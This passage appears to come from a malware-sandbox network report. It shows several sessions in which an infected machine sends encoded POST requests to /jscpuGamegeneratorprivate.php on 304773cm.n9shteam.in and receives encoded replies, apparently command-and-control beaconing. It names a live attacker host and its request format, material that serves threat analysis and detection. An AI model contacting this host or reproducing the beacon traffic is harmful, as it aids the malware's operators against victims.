4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 5b 48 7e 60 53 07 7b 67 6b 58 6f 49 78 06 7b 53 63 46 7a 5b 70 04 7b 73 62 04 68 60 52 4a 6c 67 60 03 7d 5c 70 5e 62 62 7b 5c 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}XlSV_xa\|qsjIcYfUyZk_}Llc`aO{az[uXpKiaxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\[H~`S{gkXoIx{ScFz[p{sbh`RJlg`}\p^bb{\zQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~lStB
Oct 27, 2024 02:43:48.271131039 CEST	901	IN	Data Raw: 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 7d 4c 52 00 Data Ascii: pM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W\`

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	50011	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:44:00.067842960 CEST	320	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:44:00.421704054 CEST	344	OUT	Data Raw: 00 06 01 02 06 09 01 04 05 06 02 01 02 0d 01 0a 00 01 05 0b 02 01 03 00 00 0f 0f 53 07 07 01 00 0d 53 06 0f 01 54 06 01 0e 51 05 06 06 0a 07 00 05 0a 0e 0e 0e 05 06 55 06 00 06 07 05 07 05 5a 01 05 0d 5c 04 0f 01 08 0e 53 0b 02 0a 01 0b 07 04 0d Data Ascii: SSTQUZ\SP\Q\L}R`z@tqj^a[R\|X_tltMpllsxfhSR`Yl}e~V@zm~L~bW
Oct 27, 2024 02:44:00.671709061 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:44:00.993123055 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:44:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pjNdKoyt2VjM1XopKlLEmn%2BRghuwiAo5LzPNnQyPcCIB3cLLTaShy3ZdUKChM%2BGo9mT4aKLW2zymL%2F7V1d9zjNty8Kzk1O76al%2FCl4AwxQXv5g7yojjf1UhrF6vzHP3%2F6e8OQpJbMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea7b7dd75e976-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1069&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=664&delivery_rate=1253679&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 5e 78 43 7f 4a 78 61 7c 48 7f 5f 77 4b 7e 01 60 54 7c 73 62 50 7a 5a 6c 4c 7f 62 59 59 63 73 6a 53 7b 61 65 01 61 5f 7f 5b 6a 61 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 72 59 69 60 7d 49 7b 74 6c 43 6c 64 7c 05 7b 7e 7b 46 7a 72 73 59 6c 63 76 07 7c 73 68 44 6c 59 70 03 7e 5c 7c 5d 77 71 78 4a 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}^xCJxa\|H_wK~`T\|sbPzZlLbYYcsjS{aea_[jaxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\rYi`}I{tlCld\|{~{FzrsYlcv\|shDlYp~\\|]wqxJzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwu
Oct 27, 2024 02:44:00.993226051 CEST	212	IN	Data Raw: 5a 42 7e 6c 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b Data Ascii: ZB~lStBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@al
Oct 27, 2024 02:44:00.993241072 CEST	697	IN	Data Raw: 70 02 7a 7c 68 05 77 70 5f 55 79 61 6e 59 7c 7c 7e 5f 7a 5c 79 05 76 7f 78 42 61 07 67 78 5b 4c 7e 4a 78 5e 57 5c 60 5c 6d 06 62 75 70 0d 68 6c 69 4c 77 42 5e 06 7e 73 7c 06 78 0a 7b 06 7b 59 7d 5f 7d 6e 74 0d 77 67 77 5f 7d 71 79 55 7a 53 59 51 Data Ascii: pz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx^W\`\mbuphliLwB^~s\|x{{Y}_}ntwgw_}qyUzSYQa~[Cj`z[QlgTQkCjcP^a\V~^bU[kb\|at`UhlfKPrs]ScX`SVTI\z{Zi_kGijT[nsZ~uzX\|Yb{v{R~MZ\babZwauJ\|avK\|oSiIQvkIlar\}wqSJsZldBTqd_VaWVZaNVcoIRp\|z\suLI}

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	50012	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:44:09.510418892 CEST	284	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:44:09.858977079 CEST	344	OUT	Data Raw: 05 06 04 04 03 0f 01 00 05 06 02 01 02 02 01 07 00 05 05 0a 02 05 03 09 02 06 0a 02 04 52 06 09 0d 03 05 0e 01 07 03 06 0c 51 02 07 07 05 04 02 04 50 0f 0e 0d 54 07 07 06 55 03 04 06 00 06 0f 00 53 0c 0a 07 51 07 01 0f 00 0f 0e 0f 56 0f 05 05 00 Data Ascii: RQPTUSQVTYV\L~C~pftbn\we\|O\|j]topkshxBwoceX\|TkRww_}O~V@{}nO}bu
Oct 27, 2024 02:44:10.115657091 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:44:10.436002016 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:44:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUue%2BX4Osylhk%2FkDmPDFqWvJP3VxqtdB7iEiL6zcvPEev6PxpYWS6IHFLBAsOTipmaLgy0EyLS9%2FApfjWbwuR2z0exGsgE4EJGq%2BNdyKSth6Ftpc2DVep0YmDqn6TzQWORr6%2F6m0QA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea7f2d8fb4744-DFW alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1993&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=628&delivery_rate=647295&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 5d 6c 53 68 59 78 61 60 01 7c 5f 7b 49 6a 64 7f 4f 68 06 65 0b 6d 4d 55 5c 69 62 52 02 77 5a 61 09 6e 71 76 5f 76 58 73 5f 69 5b 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 69 02 7d 06 6a 58 7b 77 7b 5f 6f 64 7c 4d 6c 7d 67 04 6e 61 78 00 7a 63 5c 05 7f 70 55 59 79 67 77 5b 7d 4c 77 40 62 62 78 49 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}]lShYxa`\|_{IjdOhemMU\ibRwZanqv_vXs_i[xUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\i}jX{w{_od\|Ml}gnaxzc\pUYygw[}Lw@bbxIzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB~l
Oct 27, 2024 02:44:10.436017036 CEST	905	IN	Data Raw: 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d 78 07 Data Ascii: StBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~Jx

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	50013	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:44:17.289716005 CEST	337	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:44:17.640363932 CEST	344	OUT	Data Raw: 00 01 04 06 03 08 01 00 05 06 02 01 02 06 01 00 00 06 05 08 02 02 03 00 01 01 0d 50 05 03 03 53 0a 01 06 0c 00 51 04 51 0f 53 02 05 05 0b 04 0e 03 00 0c 09 0d 0e 04 0b 07 07 04 01 01 05 05 5d 00 53 0e 0f 04 01 07 51 0e 02 0c 01 0d 02 0d 08 05 50 Data Ascii: PSQQS]SQPQQS\L}S\|p_\c\aae^BiBco_kcUXlRcHz`iZ\|n\|cg]_}u~V@BxCbA~\W
Oct 27, 2024 02:44:17.894025087 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:44:18.212285995 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:44:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BSUDUiq9F5Ea0s%2FRYCZiDS8fiB5xS0iCIK3aZEPDqSo1UJNmqyXEjL23cce0hnnSXvUUzQK4ffwl789PEVWSLJkmqo1TFOGZ%2F8c%2FmKLlESNPUM9O0wFb0sf%2FLNOTrn2CjRKK7vTttQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea8237c4b0bff-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=1270175&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 58 6c 6d 63 07 6f 61 74 03 7f 71 7c 5b 6a 67 67 0b 6b 60 79 0b 7b 73 51 58 7d 62 7f 5a 63 5a 79 4f 79 71 61 4b 61 66 68 4b 6a 4b 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5b 75 49 7e 4e 54 5f 79 77 78 4d 6c 59 78 07 79 6d 7c 5a 6d 5b 7c 03 7b 73 5f 5e 6b 60 6c 4b 78 5e 64 02 7e 5b 6c 5d 76 61 6f 59 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}Xlmcoatq\|[jggk`y{sQX}bZcZyOyqaKafhKjKxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|[uI~NT_ywxMlYxym\|Zm[\|{s_^k`lKx^d~[l]vaoYzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZB
Oct 27, 2024 02:44:18.212320089 CEST	907	IN	Data Raw: 7e 6c 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 4d Data Ascii: ~lStBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L~

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	50014	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:44:29.128803968 CEST	320	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:44:29.484226942 CEST	344	OUT	Data Raw: 05 01 04 04 03 0b 01 05 05 06 02 01 02 0d 01 00 00 05 05 0f 02 05 03 00 01 04 0a 00 03 05 00 01 0d 04 04 5d 07 06 06 56 0b 06 05 50 06 06 05 51 07 03 0e 59 0f 0e 05 0a 06 05 06 53 06 57 06 0f 02 56 0c 0a 05 03 06 05 0d 01 0e 04 0d 07 0f 05 07 51 Data Ascii: ]VPQYSWVQ\L~\|`rOtr_Bv\\|Rv^c\|Zks^llgz`PD}mUQwdk\iO~V@xCn}bW
Oct 27, 2024 02:44:29.726347923 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:44:30.063210011 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:44:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJNVLsaryBmoD4XokiS%2F1WDKrAzwN8BpbGexGKCiJkrypddf%2F2lOdUXcdw9405IVw4b9gpe5KsNnG7rzmb5ot9uFE0mut26Ch3sN%2BUv3qg%2Bn%2B1zKKCptpFB0sXFi6g91OKGV8NNu0w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea86d6d276bd4-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1645&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=664&delivery_rate=887254&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7d 5d 78 54 7b 00 78 4c 6b 5c 6b 61 7c 5b 69 74 63 0d 68 59 7d 41 79 4d 52 07 7e 72 7f 5c 63 60 79 0c 6d 61 66 58 76 76 52 45 7e 4b 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5c 5b 05 7d 5e 6d 44 78 64 63 5d 6f 49 7f 59 6c 7e 77 03 6e 4c 74 49 7b 73 5f 5e 68 5e 78 03 6f 64 64 44 6a 04 78 5d 61 58 64 03 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 4a 7c 6d 78 08 77 49 6c 03 69 62 53 50 69 53 64 53 7b 43 75 5f 7d 62 7a 5c 7b 5d 46 51 7c 55 68 0d 69 06 68 0c 7d 67 61 5e 6f 54 74 5f 78 62 67 59 68 5f 59 49 7d 64 78 53 68 63 66 52 7a 5d 7b 5d 7e 61 78 4b 77 63 65 51 7b 5c 79 02 77 76 68 48 7d 48 7c 07 7d 76 5f 0a 74 72 77 03 7d 62 69 4c 7f 67 66 0b 79 76 5e 0a 7c 73 7b 47 76 62 7d 41 77 [TRUNCATED] Data Ascii: 54cVJ}]xT{xLk\ka\|[itchY}AyMR~r\c`ymafXvvRE~KxUKq`bwDqj\kIzxHxjccb\ywq}k_TjRdN~wguv{\|\[}^mDxdc]oIYl~wnLtI{s_^h^xoddDjx]aXdzQA[\|wZ\|_ywllA{\|t^ryeH\|\|jzq~IacUJvOg_wbbP~]y_w[}vfphu`os]slooo^fJ\|mxwIlibSPiSdS{Cu_}bz\{]FQ\|Uhih}ga^oTt_xbgYh_YI}dxShcfRz]{]~axKwceQ{\ywvhH}H\|}v_trw}biLgfyv^\|s{Gvb}AwaSH\|_P}ld}wwuq{x\u}`}I{whxw\|MxSYxbdHxcPO`tIxId~LQwqV~\|wH\|Yp}qavR\|N{\|ht^fAyO}~\|rx_zvc]vaxvqb~`TtLmOwuZ
Oct 27, 2024 02:44:30.063222885 CEST	908	IN	Data Raw: 42 7e 6c 53 06 74 42 70 4d 7f 5d 78 00 78 7c 55 45 7a 60 7a 01 7d 7d 7c 4e 74 49 52 04 7e 62 76 08 7d 7d 55 08 7b 7d 54 05 7d 5c 71 02 7c 70 7c 0c 7c 52 70 40 7d 60 74 0a 7d 67 72 4d 7b 43 77 07 78 5c 78 05 7c 61 6b 02 7d 49 7b 0a 7f 4e 71 0b 79 Data Ascii: B~lStBpM]xx\|UEz`z}}\|NtIR~bv}}U{}T}\q\|p\|\|Rp@}`t}grM{Cwx\x\|ak}I{NqyMx}LRwMy{aawfZ~v\|M}vyvr}bq\|IPCxvl}cwJvbywamHav}ltC~YQJu_cxLa~^iyg\|xIRLy}Uyblx]v{]NZoYp}bZ^vrs[}l]E^xXq@alpz\|hwp_UyanY\|\|~_z\yvxBagx[L

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	50015	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 02:44:41.242340088 CEST	320	OUT	POST /jscpuGamegeneratorprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 304773cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Oct 27, 2024 02:44:41.593754053 CEST	344	OUT	Data Raw: 05 07 01 01 06 08 01 01 05 06 02 01 02 06 01 03 00 00 05 0d 02 04 03 0b 00 53 0c 0c 06 0f 00 09 0c 02 05 01 02 03 04 57 0b 04 05 01 00 07 07 04 07 02 0d 0a 0e 01 06 02 06 07 05 05 05 52 06 0c 01 0a 0e 0a 06 06 05 51 0b 03 0e 55 0c 0c 0d 05 05 53 Data Ascii: SWRQUSPQ\L}PhN~`[mve]S\|\|r_wUw\hMlJoooElN_^\|Sxvw\|O}u~V@Bx}z}r}
Oct 27, 2024 02:44:41.836158037 CEST	25	IN	HTTP/1.1 100 Continue
Oct 27, 2024 02:44:42.149847984 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 00:44:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B373c4YdfDfQUzgY%2FmERlSUnlLSEiBe9wIf8j2t19uOHOcVdVI3858jwX6REDywF2%2BHLegtGtdiA59BAF3L17eF%2F3bu0qw8cF5hRNWlj%2BRTAZMcfP8Vc8HxQ%2BeyzcLWlJDKUZXA4%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d8ea8b91fa33166-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1041&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=664&delivery_rate=1312783&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 63 0d 0a 56 4a 7e 00 7b 43 63 49 79 62 5a 49 7f 5f 55 07 7c 77 74 51 6b 60 5b 42 7b 63 78 4c 7f 62 63 5a 77 70 76 52 7b 61 75 4b 75 66 7c 4b 7c 71 78 01 55 4b 71 0c 60 62 77 44 7f 71 6a 5c 6b 49 7a 0c 78 48 78 0a 6a 63 63 01 62 5c 79 07 77 71 7d 00 6b 5f 54 03 6a 52 64 4e 7e 77 67 01 75 76 7b 06 7c 5b 7d 00 69 60 75 49 79 74 60 07 78 67 74 4f 7b 0b 67 04 6d 61 7c 48 6f 63 6e 41 7f 06 74 4a 6c 64 70 49 69 5b 73 05 61 62 63 5c 7a 51 41 5b 7c 77 5a 0d 7c 5f 79 0c 77 6c 6c 41 7b 7f 7c 05 74 5e 72 0d 79 07 65 48 7c 7c 6a 07 7a 71 7e 49 61 63 55 4a 76 4f 67 5f 77 62 62 50 7e 5d 79 5f 77 5b 7d 07 76 66 70 09 68 0a 75 01 60 6f 73 5d 7f 73 6c 01 6f 6f 7f 03 6f 5e 66 